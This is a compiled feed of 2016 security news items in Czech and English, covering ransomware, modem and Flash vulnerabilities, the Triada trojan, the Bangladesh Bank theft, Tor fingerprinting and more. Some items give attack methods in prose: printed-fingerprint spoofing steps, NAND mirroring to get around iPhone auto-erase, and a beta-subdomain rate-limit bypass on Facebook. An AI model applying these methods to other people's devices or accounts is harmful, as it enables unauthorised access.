„Virová nákaza se šíří prostřednictvím e-mailových zpráv, které obsahují přílohu ve formátu zip. Ta je nejčastěji označená jako faktura nebo pozvání k soudu. Tímto trikem se útočníci snaží oběť navést k tomu, aby otevřela obsah přílohy. V té se skrývá javascript soubor, který po otevření do počítače nainstaluje škodlivý kód Nemucod, který může do zařízení stáhnout další malware,“ vysvětluje Petr Šnajdr, bezpečnostní expert v Esetu.

„Aktuálně stahuje především různé typy ransomwaru, například známý TeslaCrypt nebo Locky. Následně tento škodlivý kód začne šifrovat obsah počítače a uživateli zobrazí oznámení, že za dešifrování počítače musí zaplatit,“ dodává Šnajdr.

Tento filecoder je nebezpečný tím, že používá kvalitní šifrování podobné nebo totožné s tím, které používají například finanční instituce při zabezpečení on-line plateb.

Ransomware je typ malwaru, který zabraňuje přístupu k osobnímu počítači či mobilnímu zařízení, či k datům zde uloženým. Pro umožnění přístupu je vyžadováno zaplacení výkupného (ransom). Šifrování je zpravidla natolik silné, že jej nelze prolomit.

Ochrana před ransomwarem podle bezpečnostních expertů:

Neotvírejte přílohy zpráv od neznámých adresátů a případně ani ty, které jste vůbec neočekávali.
Varujte kolegy v odděleních, která nejčastěji dostávají e-mailové zprávy z externího prostředí – například personální či finanční oddělení.
Pravidelně zálohujte obsah svého zařízení. I v případě úspěšné infekce se tímto způsobem budete moci dostat k svým datům. Externí disk nebo jiné úložiště však nemohou být neustále připojené k zařízení, jinak bude jejich obsah také zašifrovaný.
Pravidelně aktualizujte operační systém a ostatní programy, které používáte na svém zařízení. Pokud používáte již nepodporovaný operační systém Windows XP, vážně zvažte přechod na novější verzi Windows.
Bezpečnostní software používejte nejen s nejnovějšími aktualizacemi, ale ideálně i jeho nejnovější verzi.


0-day critical flaws in mobile modems allow hackers to take over your PC

11.3.2016 Vulnerebility

The Russian security tester Timur Yunusov has discovered critical flaw affecting routers and 3G and 4G mobile modems from Huawei, ZTE, Gemtek, and Quanta.
The Russian security tester Timur Yunusov has discovered critical vulnerabilities affecting routers and 3G and 4G mobile modems from Huawei, ZTE, Gemtek, and Quanta. The security holes could be exploited by remote attackers to completely compromise machines and intercept HTTP traffic and also SMSs.
Yunusov, a security expert at the Positive Technologies, presented the discovery at the Nullcon conference held in Goa. He discovered the flaws in at least eight different devices. A rapid query on the Shodan search engine allowed him to find more than 42,000 vulnerable devices exposed on the web.

The results include roughly 2800 Gemtek modems and routers and 1250 from Quanta and ZTE.

Shodan result vulnerable routers mobile modems

“All the modem models investigated had critical vulnerabilities leading to complete system compromise,” Yunusov says. “Virtually all the vulnerabilities could be exploited remotely.”

The penetration tester explained that in some cases the vulnerabilities are introduced by the service providers likely to personalize the firmware running on the device. The vulnerabilities are critical because an attacker can remotely trigger them to compromise connected devices, including connected computers.

“Not all the modems had vulnerabilities in their factory settings; some of them appeared after the firmware was customised by the service provider.” he says “If we penetrate a modem … infecting a PC connected to it provides us with many ways to steal and intercept the PC user’s data,”
Almost all devices tested by Yunusov are affected by cross-site request forgery vulnerabilities and lack of input validation, this means that 60 percent of the equipment was exposed to remote code execution.

vulnerable routers modem vulnerability chard mobile modems

The Gemtekm Huawei and Quanta devices resulted vulnerable to firmware modifications, in some cases, the expert noticed that it was possible to upload arbitrary firmware on the units allowing to completely compromise them. Four of the eight modems and routers are affected by cross-site scripting vulnerabilities that could be exploited by a remote attacker to infect the host and intercept SMS for dedicated attackers who want to geo-locate targets.

Timur Yunusov, Kirill Nesterov and their colleagues at Positive Technologies have already conducted a similar study in the past, in October they have found since-patched remote execution and denial of service vulnerabilities in the popular Huawei 4G USB Huawei E3272 modem that can allow hackers to hijack connected computers.

In December, a team of researchers at Positive Technologies conducted a study on how to compromise USB modems and attack SIM cards via SMS over 4G networks.

The team consisting of Sergey Gordeychik, Alexander Zaitsev, Kirill Nesterov, Alexey Osipov, Timur Yunusov, Dmitry Sklyarov, Gleb Gritsai, Dmitry Kurbatov, Sergey Puzankov and Pavel Novikov discovered that 4G USB modems are affected by vulnerabilities that could be exploited by threat actors to gain full control of the machines to which the devices are connected.


Adobe issues emergency out-of-band update for actively exploited 0Day
11.3.2016 Vulnerebility

Adobe has released an emergency out-of-band update to fix a zero-day vulnerability that is being used in targeted attacks.
It’s happened again, Adobe has Issued an emergency Out-of-Band update For Flash Zero-Day that is being exploited in targeted attacks. The unfortunate thing is that the Out-of-Band Patch For Flash Zero-Day comes just a couple of days after releasing the announced updates to fix critical vulnerabilities in Acrobat, Reader and Digital Editions.

The zero-day vulnerability (CVE-2016-1010) addressed by the last Emergency Out-of-Band update has been discovered by threat researcher Anton Ivanov from Kaspersky Lab, ’s vulnerability (CVE-2016-1010) and has been exploited in a limited number of targeted attacks.

CVE-2016-1010 is an integer overflow vulnerability that allows attackers to remotely execute malicious code on vulnerable computers.

“Today Adobe released the security bulletin APSB16-08, crediting Kaspersky Lab for reporting CVE-2016-1010. The vulnerability could potentially allow an attacker to take control of the affected system. Kaspersky Lab researchers observed the usage of this vulnerability in a very limited number of targeted attacks.” states the email sent by a Kaspersky representative to Ars.
“At this time, we do not have any additional details to share on these attacks as the investigation is still ongoing. Even though these attacks are rare, we recommend that everyone get the update from the Adobe site as soon as possible.”

The Emergency Out-of-Band update also fixes also other critical vulnerabilities that could allow an attacker to gain complete control over vulnerable systems.

According to the security bulletin issued by Adobe, the vulnerabilities addressed by the new patch affect all platforms.

“Adobe has released security updates for Adobe Flash Player. These updates address critical vulnerabilities that could potentially allow an attacker to take control of the affected system. Adobe is aware of a report that an exploit for CVE-2016-1010 is being used in limited, targeted attacks.” states the security advisory.

emergency out-of-band update Adobe

The vulnerability details are:

These updates resolve integer overflow vulnerabilities that could lead to code execution (CVE-2016-0963, CVE-2016-0993, CVE-2016-1010).
These updates resolve use-after-free vulnerabilities that could lead to code execution (CVE-2016-0987, CVE-2016-0988, CVE-2016-0990, CVE-2016-0991, CVE-2016-0994, CVE-2016-0995, CVE-2016-0996, CVE-2016-0997, CVE-2016-0998, CVE-2016-0999, CVE-2016-1000).
These updates resolve a heap overflow vulnerability that could lead to code execution (CVE-2016-1001).
These updates resolve memory corruption vulnerabilities that could lead to code execution (CVE-2016-0960, CVE-2016-0961, CVE-2016-0962, CVE-2016-0986, CVE-2016-0989, CVE-2016-0992, CVE-2016-1002, CVE-2016-1005).
In order to reduce the attack surface, uninstall any browser extensions that is not really necessary for your work.


Google Android N Preview — 6 Cool Features That You Should Know
11.3.2016 Mobil
Android N Developer Preview, an early beta of Google’s new mobile operating system that was expected to launch on Google I/O in mid-May, is unexpectedly launching right now.
Android N Developer Preview for the Nexus 6P, Nexus 5X, Nexus 6, Pixel C Nexus 9, the Nexus Player and the General Mobile 4G, an Android One device has been made available as an over-the-air update by Google on Wednesday.
So, you can test out Android N Developer Preview on your smartphone and tablet right now from developer.android.com/preview.
The good news is that the Google Android team has brought meaningful features to your smartphone and tablet in just five months.
"As we look to the next release of Android, N, you’ll notice a few big changes aimed at you as developers: it’s earlier than ever, it’s easier to try and we’re expanding the ways for you to give us feedback," Hiroshi Lockheimer, Google's SVP for Android writes. "We hope these changes will ensure that you are heard and reflected – that’s what makes Android stronger."
Here's what I like about the new Android Developer Preview so far.
1. Multi-Window API
google-android-n-download-1
Multi-window support is the feature users have long asked for – especially on tablets. The feature allows users to perform multiple tasks simultaneously.
So now you can type out a message while viewing a map, check the weather while watching videos, and so on. The screen can be split horizontally or vertically as you prefer.
2. Reply to Messages Directly Without Leaving an App
google-android-n-direct-reply
Among the new changes in Android N are improved notifications. Notifications support "direct reply" feature for app developers who can now allow their users to reply to incoming notifications of WhatsApp, Twitter or SMS messages straight from the notification panel without having to launch the app in question.
Developers can also choose to bundle notification alerts from the same app together, enabling users to see them as a bundle and expand individually if necessary.
3. Better Battery Life
This is the biggest relief for all Android users. With Android Marshmallow, Google introduced a new battery-saving feature called Doze that places an Android device into a deep power-savings mode when it is stationary for a while.
In Android N, Google is taking this feature a step further by allowing Doze to work whenever the screen is OFF, not just when the device is stationary. So your smartphone's battery will now last even longer when it's in standby mode.
4. Data Saver
google-android-n-data-saver
Moreover, Google continues to work on making its Android OS less memory-hungry and making apps running in the background work more efficiently.
When turned ON, the Data Saver feature restricts the apps from using data connection as well as prevent pulling in embedded videos and images on web pages. You can also pick selected apps that may be allowed to use the data connection even when the feature is ON.
However, the Data Saver feature in Android N will be particularly helpful for those who are on prepaid or pay-on-the-go connections for data.
5. Picture-in-Picture Mode
google-android-n-picture-in-picture
Now you can view a YouTube video while reading through a report in Word on your Android device, thanks to Picture-in-picture feature in Android N.
"Picture-in-picture (PIP) mode lets apps run a video activity in the pinned window while another activity continues in the background. The PIP window lets users multitask while using your app, which helps users be more productive." Google describes.
The feature will be more useful for those with tablets or larger phones.
6. No Need to Flash Your Device (Direct Boot)
Yes, the most brilliant part is that you do not need to flash or tether your device to a PC in order to download and install the new Android N Developer Preview, as it can be downloaded straight to your device.
These are the things that are now known to us about the all new Android N Developer Preview, but one thing we definitely don’t know yet that what the ‘N’ will stand for. For me it’s Nutella.
What do you think the "N" will stand for? Hit the comments below and let us know.


Triada Trojan the most sophisticated mobile malware seen to date
11.3.2016 Virus Mobil

Kaspersky Lab recently spotted a new Android malware dubbed Triads Trojan, which they say is the most advanced mobile malware seen to date.
Malware researchers at Kaspersky Lab have discovered a new strain of malware, dubbed Triada (Backdoor.AndroidOS.Triada), targeting Android devices, which they consider the most advanced mobile threat seen to date. The range of techniques used by the threat to compromise mobile devices is not implemented in any other known mobile malware.

Triada was designed with the specific intent to implement financial frauds, typically hijacking the financial SMS transactions. The most interesting characteristic of the Triada Trojan apart is its modular architecture, which gives it theoretically a wide range of abilities.

The Triada Trojan is able to infiltrate all process running on the mobile devices gaining persistence, as explained by researchers Nikita Buchka and Mikhail Kuzin from Kaspersky Lab.

“Considering the aforementioned modular architecture and privileged access to the device, the malware can create literally anything. The capabilities of the uploaded modules are limited only by the imagination and skills of the virus writers. These malicious programs (the app loader and the modules that it downloads) belong to different types of Trojans, but all of them were all included in our antivirus databases under the name Triada.” reads a blog post published by the researchers.

The Android malware is spread through an “advertising botnet” that was used by crooks to spread also other threats, including Leech, Ztorg, and Gorpo and AndroidOS.Iop.

The Triada Trojan makes use of the Zygote parent process to implement its code in the context of all software on the device, this means that the threat is able to run in each application.

“A distinctive feature of the malicious application is the use of the Zygote process to implement its code in the context of all the applications on the device. The Zygote process is the parent process for all Android applications. It contains system libraries and frameworks used by almost all applications. This process is a template for each new application, which means that once the Trojan enters the process, it becomes part of the template and will end up in each application run on the device. This is the first time we have come across this technique in the wild; Zygote was only previously used in proof-of-concepts.”

Triada Trojan

The trojan is hard to detect, it mainly operates in RAM and exploiting root privileges it substitutes system files, it also hides its modules from the list of running/installed services and applications.

Below the list of features for the Triada Trojan.

Modular functionality with active use of superuser privileges
Main part of malicious functionality exists in device RAM only.
Trojan modifies Zygote system process in the memory to achieve persistence.
Industrial approaches used in its development, suggesting its authors are highly qualified.


How to hack mobile phones embedded fingerprint sensor using 2D Printed fingerprints
11.3.2016 Mobil

Two Computer Science researchers developed a technique to hack a phone’s fingerprint sensor in 15 mins with $500 worth of inkjet printer and conductive ink
The Computer Science researchers Kai Cao and Anil K Jain have developed a new technique for hacking a mobile device’s fingerprint sensor in 15 mins with $500 worth of an inkjet printer and conductive ink.

This kind of attacks is very dangerous considering that it has been forecasted that 50% of smartphones sold by 2019 will have an embedded fingerprint sensor.

It is also important to highlight that a growing number of features and applications will rely on fingerprint recognition on mobile devices, for example, secure mobile payment and other transactions.

The duo used a 300dpi scan of a fingerprint to produce a working replica printed of a fingerprint in less than 15 minutes, and the original image could be taken from a fingerprint sensor itself.

The computer experts explained that spoofing attacks still represent a serious problem for embedded fingerprint systems.

“Spoofing refers to the process where the fingerprint image is acquired from a fake finger (or gummy finger) rather than a live finger.” wrote the duo in the paper titled Hacking Mobile Phones Using 2D Printed Fingerprints.

A first proof of concept attack of this kind was presented at Germany’s Chaos Computer Club in 2013 to hack an iPhone 5s, in 2014 the German researcher Jan Krissler, aka Starbug, demonstrated at the same hacking conference how to bypass Fingerprint biometrics using only a few photographs.

The principal limitations of the above techniques are the need to fabricate the spoof manually and the fact that this process is time-consuming.

The method developed by the two researchers overwhelms these limitations, it relies on the sensor embedded in the mobile phone and uses a 2D fingerprint image printed on a special paper. The spoof fingerprint is generated automatically, below the steps of the method developed by the researchers:

Install three AgIC4 silver conductive ink cartridges as well as a normal black ink cartridge in a color inkjet printers (Brother MFC-J5910DW printer was used by us); better conductivity can be achieved if a brand new (unused) printer is used;
Scan the target fingerprint image (of the authorized user) at 300 dpi or higher resolution;
Mirror (reverse the image in the horizontal direction) and print the original or binarized fingerprint image on the glossy side of an AgIC special paper;
spoofing fingerprint sensor

The MSU researchers demonstrated that the attack on fingerprint readers works on various Samsung mobile devices, and less well on some Huawei phones.

“In summary, we have proposed a simple, fast and effective method to generate 2D fingerprint spoofs that can successfully hack built-in fingerprint authentication in mobile phones. Furthermore, hackers can easily generate a large number of spoofs using fingerprint reconstruction [3] or synthesis [4] techniques which is easier than 2.5D fingerprint spoofs.” states the researchers.

“This experiment further confirms the urgent need for antispoofing techniques for fingerprint recognition systems [5], especially for mobile devices which are being increasingly used for unlocking the phone and for payment. It should be noted that not all the mobile phones can be hacked using proposed method. As the phone manufactures develop better anti-spoofing techniques, the proposed method may not work for the new models of mobile phones. However, it is only a matter of time before hackers develop improved hacking strategies not just for fingerprints, but other biometric traits as well that are being adopted for mobile phones (e.g., face, iris and voice).”

The duo confirmed that this is a preliminary study, they will go deep into the analysis of fingerprint sensor.

Below a video PoC of the method developed by the researchers


Chrome i Flash Player obsahují nebezpečné trhliny

10.3.2016 Zranitelnosti
Obezřetní by měli být uživatelé internetu při prohlížení videí i webových stránek. Programy Google Chrome a Adobe Flash Player, které k této činnosti slouží, totiž obsahují nebezpečné trhliny. Záplaty jsou však naštěstí již k dispozici.
Tvůrci webového prohlížeče Chrome už minulý týden vydávali velký balík oprav, který sloužil jako záplata pro více než dvě desítky zranitelností, připomněl server Security Week.

Aktualizace z tohoto týdne opravuje pouze tři trhliny, přesto by s jejich instalací neměli uživatelé zbytečně otálet. Vývojáři totiž jejich důležitost označují jako vysokou. Takovéto chyby zpravidla mohou počítačoví piráti zneužít k propašování škodlivých virů do cizích počítačů.

Chyby jsou obsaženy v Chromu pro Windows, Linux i pro Mac OS X.

Propašovat mohou prakticky libovolný virus
Trhlinám v zabezpečení se nevyhnul ani oblíbený program Flash Player od společnosti Adobe. Ten slouží k přehrávání videí na internetu a na celém světě jej používají milióny lidí. Právě proto se na něj kyberzločinci zaměřují pravidelně a nové aktualizace vycházejí prakticky měsíc co měsíc.

Objevená zranitelnost může vést ke vzdálenému spuštění kódu, tedy k instalaci prakticky jakéhokoliv viru na cizím počítači. Ohroženi jsou přitom majitelé prakticky všech aktuálně dostupných operačních systémů.

Adobe navíc záplatovala tento týden také své další produkty – Acrobat, Reader a Digital Edition.

Chyby jsou i ve Windows a Internet Exploreru
V případě automatických aktualizací se uživatelé Chromu ani programů od Adobe nemusejí o nic starat. Pokud je však tato funkce vypnuta, je nutné navštívit webové stránky tvůrců a nejnovější záplatovanou verzi stáhnout manuálně.

Na pozoru by se měli mít také uživatelé operačního systému Windows a webových prohlížečů Internet Explorer a Edge. Také v nich byly objeveny kritické chyby. Microsoft je tento týden opravil v rámci pravidelných aktualizací, které vycházejí vždy druhé úterý v měsíci.


ISIS – Disclosed thousands of files reporting the identity of 22,000 Jihadis
10.3.2016 Hacking

A former ISIS member has stolen and disclosed thousands of documents reporting the identity of 22,000 Jihadis and other important information.
Thousands of documents reporting the identity of 22,000 Jihadis are handed to Sky News by a former member of the ISIS radical organisation. The documents contain 22,000 names, addresses, telephone numbers and family contacts of ISIS members.

Sky News has obtained a memory stick containing the files that were stolen from the head of Islamic State’s internal security police. The man who stole the memory stick was a former Free Syrian Army convert to Islamic State who calls himself Abu Hamed.

“Disillusioned with the Islamic State leadership, he says it has now been taken over by former soldiers from the Iraqi Baath party of Saddam Hussein.” states SkyNews.

The journalists met him in a secret location in Turkey, the man revealed that the IS was giving up on its headquarters in Raqqa and moving into the central deserts of Syria and ultimately Iraq.

The list of the ISIS members includes militants from more than 51 countries, including the UK. The document is a sort of IS registration form composed of 23 questions that wannabe members had to fill with their personal information.

There are many previously unknown European jihadis in the documents, as well as IS members from the Middle East, North Africa, United States and Canada.

Many names are already known to the Western Intelligence, anyway the presence of the documents online is very important for different reasons. It is essential to understand who really, and how, has obtained the documents.

One of the documents, titled “Martyrs,” includes a list of members ready to carry out suicide attacks, these terrorists have been already trained for such kind of operations.

We cannot exclude that they could be also part of a diversionary strategy of the IS group.

“Abdel Bary, a 26-year-old from London joined in 2013 after visiting Libya, Egypt and Turkey. He is designated as a fighter but is better known in the UK as a rap artist. His whereabouts are unknown. Another jihadi named in the documents, now dead after being targeted in a drone strike, is Junaid Hussain, the head of Islamic State’s media wing who along with his wife former punk Sally Jones, plotted attacks in the UK. Her whereabouts are unknown.” states the post published by SkyNews.

“Reyaad Khan from Cardiff, who also entered in 2013, is also among those found among the registration forms. He was well known for appearing in a highly produced Islamic State propaganda video. He was later killed.”

SkyNews confirmed that many jihadis passed through a series of jihadi “hotspots,” including Yemen, Sudan, Tunisia, Libya, Pakistan and Afghanistan. In any cases, they were able to enter the territory controlled by the IS, join the fights and return home.

The documents are a mine of information for the intelligence, they include many telephone numbers likely belonging to the family members and the jihadis.

The man that disclosed the documents sustains that today the IS has no rules, he doesn’t share the ideology that today is animating the group, so decided to quit the ISIS. He also made another shocking revelation, according to Abu Hamed the ISIS organisation is secretly working with The Kurdish YPG and the Syrian Government to persecute the Syrian opposition.

Also the news portal Zaman Al Wasl (zamanalwsl.net) claimed to have in exclusive 1736 documents revealing ISIS jihadists personal data, it also published it.

“Two thirds of ISIS manpower are from Saudi Arabia, Tunisia, Morocco and Egypt. 25% of ISIS fighters are Saudis, the data disclosed. While Turkish fighters are taking the lead among ISIS foreign fighters, French fighters come next. Syrians are just 1.7 % of the total number of fighters. The Iraqis make 1.2. ” states the Zaman Al Wasl that analyzed the documents it obtained.

ISIS documents


Snowden FBI is lying, it can already unlock iPhone without Apple support
10.3.2016 Apple

Snowden accuses the FBI of lying about his ability to unlock the iphone of the San Bernardino terrorist. “that’s horse sh*t.” he said.
While the dispute between Apple and the FBI on the San Bernardino shooter’s iPhone case continues, the popular NSA whistleblower Edward Snowden takes a position giving us his opinion, and it is not so surprising.

The FBI wants to obtain a court order to force Apple to unlock the terrorist’s iPhone, the authorities have tried to do it, but an error made during the government custody apparently made impossible for the police to access the device. The FBI is demanding that Apple disables the iPhone’s “auto-erase” security feature that wipes the Apple mobile device after 10 failed passcode attempts.
On the other hand, the company of Cupertino is refusing to unlock the device, announcing a legal battle that could reach the Supreme Court.

Snowden in a video call at Blueprint for a Great Democracy conference on Tuesday accuses the FBI of lying defining its declaration defining its claims as absurd, in reality, he used a more colorful expression.

“The FBI says Apple has the ‘exclusive technical means’ to unlock the phone,” said Snowden in video conference “Respectfully, that’s horse sh*t.”
Snowden opinion on Apple vs FBI case

On the same day, Snowden shared via Twitter a link to an American Civil Liberties Union blog post titled “One of the FBI’s Major Claims in the iPhone Case Is Fraudulent,” which explains that the FBI has the ability to bypass iPhone protection mechanism.

“But the truth is that even if this feature is enabled on the device in question, the FBI doesn’t need to worry about it, because they can already bypass it by backing up part of the phone (called the “Effaceable Storage”) before attempting to guess the passcode. I’ll go into the technical details (which the FBI surely already knows) below.” states the post.

The post explains that FBI can simply make a copy of the content of the Effaceable Storage while trying to guess the passcode.

“So the file system key (which the FBI claims it is scared will be destroyed by the phone’s auto-erase security protection) is stored in the Effaceable Storage on the iPhone in the “NAND” flash memory. All the FBI needs to do to avoid any irreversible auto erase is simple to copy that flash memory (which includes the Effaceable Storage) before it tries 10 passcode attempts. It can then re-try indefinitely, because it can restore the NAND flash memory from its backup copy.” continues the post.

“The FBI can simply remove this chip from the circuit board (“desolder” it), connect it to a device capable of reading and writing NAND flash, and copy all of its data. It can then replace the chip, and start testing passcodes. If it turns out that the auto-erase feature is on, and the Effaceable Storage gets erased, they can remove the chip, copy the original information back in, and replace it. If they plan to do this many times, they can attach a “test socket” to the circuit board that makes it easy and fast to do this kind of chip swapping.”

Snowden opinion on Apple vs FBI case - internal iPhone

Image credit: http://www.mobpart.com/iphone-5c-c-61_63

Snowden expressed his solidarity to IT giants that are working to provide new solutions, and improve the existing ones, to protect the users’ privacy through the implementation of strong encryption.

“We should support vendors who are willing to [say], ‘You know, just because it’s popular to collect everybody’s information and resell it to advertisers and whatever, it’s going to serve our reputation, it’s going to serve our relationship with our customers, and it’s going to serve society better. If instead we just align ourselves with our customers and what they really want, if we can outcompete people on the value of our products without needing to subsidize that by information that we’ve basically stolen from our customers’,” he told TechCrunch in June, months before the December massacre in San Bernardino. “That’s absolutely something that should be supported.”


Bangladesh says hackers stole $100 Million from its US Federal Reserve account

10.3.2016 Incindent

Unknown hackers have stolen more than $100 million from the Bangladesh Bank account at the US Federal Reserve Bank.
According to Bloomberg, the Bangladesh’s Finance Minister Abul Maal Abdul Muhith is accusing the U.S. Federal Reserve for the theft of at least $100 million stolen from the Bangladesh’s account. Bangladesh is threatening the US for a legal fight to retrieve the funds, explained Muhith in a press conference held in Dhaka on Tuesday. The central bank of Bangladesh declared the funds had been stolen from an account by hackers, the experts had traced some of the missing funds in the Philippines.

“We kept money with the Federal Reserve Bank and irregularities must be with the people who handle the funds there,” Muhith said. “It can’t be that they don’t have any responsibility.”

While the central bank of Bangladesh is blaming Chinese hackers, the Federal Reserve is denying the security breach of security took place.

On Monday, a spokeswoman for the US Federal Reserve Bank of New York confirmed there was no evidence of a security breach, neither that the Bangladesh Bank account had been hacked.

Federal reserve bank hacking

The Fed spokeswoman clarified that every payment follows standard protocols and is authenticated by the SWIFT message system used by financial institutions

“To date, there is no evidence of any attempt to penetrate Federal Reserve systems in connection with the payments in question, and there is no evidence that any Fed systems were compromised,” said New York Fed spokeswoman Andrea Priest.

Currently, the US Fed and the Bangladesh Government are investigating the incident.

The Bangladesh’s central bank has about $28 billion in foreign currency reserves, according to the country’s Prothom Alo newspaper, at least 30 transfer requests were made on February 5 using the Bangladesh Bank’s SWIFT code. Five transfers were successfully completed.

How is possible?

Difficult to say because there aren’t details on the event. It is likely hackers breached Bangladesh Bank in early February stealing credentials for payment transfers, then they used the credentials to order transfers out of a Federal Reserve Bank of New York account held by Bangladesh Bank.

Anyway it is a complex hack, attackers had a deep knowledge about Bangladesh Bank’s procedures for ordering transfers, likely they spied on Bangladesh Bank staff to gather the information.

Other incidents involved the US Feds in the past, in 2014 a British citizen was accused of hacking its servers and leaking sensitive data.


Tracking users on the Tor Network through mouse movements
10.3.2016 Safety

A security researcher has devised a new technique to track users by analyzing the mouse movements, even when surfing on the Tor network.
While we surf on the Internet we leave an impressive amount of traces that could be used to track our profile and also reveal our identity even we are visiting resources in the darknet.

The way a user moves writes a blog post or moves a mouse could allow to track him.

The security researcher Jose Carlos Norte (@jcarlosnorte) has elaborated a technique relying on Javascript to create a unique fingerprint of internet users that could be used to track users while accessing the Tor network.

“While preventing users IP address to be disclosed is a key aspect for protecting their privacy, a lot of other things need to be taken into consideration. Tor browser is preconfigured to prevent a lot of possible attacks on user privacy, not only the communications layer provided by tor itself.” wrote Jose Carlos Norte.

“One common problem that tor browser tries to address is user fingerprinting. If a website is able to generate a unique fingerprint that identifies each user that enters the page, then it is possible to track the activity of this user in time, for example, correlate visits of the user during an entire year, knowing that its the same user. Or even worse, it could be possible to identify the user if the fingerprint is the same in tor browser and in the normal browser used to browse internet. It is very important for the tor browser to prevent any attempt on fingerprinting the user.”

surveillance NSA mobile

The researcher explained that his Javascript code, once deployed on a website, could fingerprint a user based on how he moves the mouse. The researcher explained that observing user’s movements in a ‘significant’ number of pages the user visits on the clear web it is possible to create a unique fingerprint that can allow his identification even when he is in the Tor network.

The expert created a quick and dirty PoC called UberCookie to demonstrate that is possible to fingerprint a user in a controlled environment.

Norte explained that the most interesting fingerprinting vector he discovered on Tor Browser is getClientRects that allows to get the exact pixel position and size of the box of a given DOM element.

The results of the getClientRects call depend on multiple factors, including the resolution and the font configuration that can compose the fingerprinting vector.

Lorenzo Bicchierai from MotherBoard tried to contact members of the Tor Project and is still waiting for a reply.

“The Tor Project did not respond to a request for comment, but it seems that its developers are looking into this issue, according to two official bug reports. ” wrote Bicchierai.

The popular cyber security expert Mikko Hypponen published a Tweet that define “clever” the technique.

To avoid beign tracked with this fingerprint technique users can deactivate Javascript completely.


Čínští ISP vsouvají do stránek malware a inzerci

9.3.2016 Viry

Nejde přitom o nějaké malé poskytovatele připojení, přistiženy byly China Telecom a China Unicom, dva z největších ISP v zemi.
Podle trojice izraelských výzkumníků (viz PDF na Website-Targeted False Content Injection by Network Operators) se čínští poskytovatelé připojení k internetu věnují vsouvání obsahu do stránek, které navštíví jejich uživatelé. V systému proxy serverů do webů přidávají jak reklamy, tak odkazy na malware. Týká se to i situace, kdy návštěvník vstupuje na weby, které jsou hostované v systémech těchto ISP.

Alarmující na těchto aktivitách je, že se jí věnují i dva z největších ISP v zemi, China Telecom a China Unicom. Ty zároveň v zásadě vlastní veškerý provoz, který pochází od menších ISP a probíhá mezi nimi a zbytkem země či světa.

Celé to funguje tak, že je využíván systém detekce specifických URL, které jsou poté přesměrovány a zpracovávány. Ještě zajímavější je, že dochází ke zkoumání procházejících paketů a jejich modifikaci, ale bez zahození originálu. Spolu s originálem je pak posílán i změněný paket.

V praxi to poté znamená, že příjemce může ve finále získat jeden z těchto dvou paketů, originál nebo změněný. Využívá se i 302-Redirect místo původní 200-OK odpovědi, dojde tím k přesměrování na jiné webové stránky.

Zásah do komunikace probíhá ale pouze tam, kde je používána nezabezpečená komunikace, vyhnout se problémům lze tedy důsledným používáním https.


Outlook už e-maily nemaže. Microsoft opravil nepříjemnou chybu

9.3.2016 Zranitelnosti
Uživatelé poštovního klienta Outlook se v minulých dnech mohli setkat s nepříjemnou chybou, kvůli které se mazaly e-maily ze serveru. Díky nové opravě to však už nehrozí. Microsoft vydal aktualizaci v úterý.
Novinky.cz o chybě informovaly minulý týden po upozornění jednoho z čtenářů. [celá zpráva]

Vývojáři z Microsoftu o chybě věděli jen o několik dnů déle. To jinými slovy znamená, že na vytvoření záplaty jim stačily necelé dva týdny. Běžně se v takto krátkém čase řeší trhliny týkající se bezpečnosti uživatelů, o což v tomto konkrétním případě vůbec nešlo.

Microsoft Outlook 2016

Chyba se týkala pouze protokolu POP3
Chyba se týkala pouze uživatelů Outlooku 2016, kteří používali poštovní protokol POP3. Ten funguje tak, že uživateli se do počítače nebo chytrého telefonu stáhnou všechny e-maily a bez ohledu na to, zda je časem smaže či nikoliv, zůstanou uchovány na serveru.

Problém byl ale v tom, že v nejnovější verzi poštovního klienta od společnosti Microsoft byly e-maily mazány ze serveru okamžitě. A to i v případě, že v něm bylo nastaveno, že tak má učinit až po nějaké době.

Stahovat aktualizaci je možné prostřednictvím služby Windows Update.


Triviální chyba umožňovala krádeže účtů na Facebooku opakovaným hádáním hesla

9.3.2016 Zranitelnosti
Triviální chyba umožňovala krádeže účtů na Facebooku opakovaným hádáním hesla
Indický bezpečnostní inženýr Anand Prakash objevil závažnou zranitelnost v zabezpečení největší sociální sítě. Umožňovala změnu hesla oběti jen za pomoci hrubé síly.

Zranitelnost se nacházela v mechanismu obnovy zapomenutého hesla. Uživatel má v takovém případě možnost zaslání kódu pro obnovení hesla přes e-mail nebo telefon. Šestimístné číslo následně zadá přímo na Facebooku, přičemž nastaví heslo nové.

Síť podle Prakash blokuje zadávání kódu po 10 až 12 neúspěšných pokusech. Omezení se však dalo obejít přístupem přes adresy beta.facebook.com či mbasic.beta.facebook.com, kde nebylo implementováno. Útočník tak mohl hádáním číselných kombinací získat přístup k cílenému účtu. Znamená to sice milion možností, ale pro automatický skript by to byla jednoduchá, výkonově nenáročná úloha.

Po nastavení nového hesla se hacker přihlásí do účtu za pomoci e-mailu nebo telefonního čísla dané osoby. Může jít o známé údaje zejména v případech, kdy svou oběť zná.
Facebook se o chybě dozvěděl 22. února a chybu ihned s přispěním Prakashe opravil. Ind na oplátku dostal odměnu ve výši 15 tisíc amerických dolarů (370 tisíc korun).


More than 1 Million Websites Install Free SSL Certificate (and Counting...)
9.3.2016 Security
Let's Encrypt has achieved another big milestone by issuing 1 million free Transport Layer Security (TLS) SSL Certificates to webmasters who wish to secure the communications between their users and domains.
Let's Encrypt – operated by the Internet Security Research Group (ISRG) – is an absolutely free, and open source certificate authority recognized by all major browsers, including Google's Chrome, Mozilla's Firefox and Microsoft's Internet Explorer.
It is just three months and five days since Let's Encrypt launched a beta version of the service, and the group has crossed 1 Million certificates in use across the Web, Let's Encrypt said in a blog post on Tuesday.
Let's Encrypt allows anyone to obtain Free SSL/TLS (Secure Socket Layer/Transport Layer Security) certificates for their web servers.
Backed by companies including EFF, Akamai and Mozilla, the Let's Encrypt project started offering Free HTTPS certs to everyone from last December.
Let's Encrypt certificates are configured with cross-signatures from SSL cert provider IdenTrust, making its free certs trustworthy and allowing users to browse more securely on the Internet.
With Let's Encrypt, it is very easy for anyone to set up an HTTPS website in a few simple steps (Here's How to Install Free SSL Cert).
Here's what Let's Encrypt says in its post:
"Much more work remains to be done before the Internet is free from insecure protocols, but this is substantial and rapid progress. It is clear that the cost and bureaucracy of obtaining certificates was forcing many websites to continue with the insecure HTTP protocol, long after we've known that HTTPS needs to be the default.
We're very proud to be seeing that change, and helping to create a future in which newly provisioned websites are automatically secure and encrypted."
Let's Encrypt had signed its First free HTTPS certificate in September, and its client software emerged in early November.
Also Read: Hackers Install Free SSL Certs from Let's Encrypt On Malicious Web Sites.
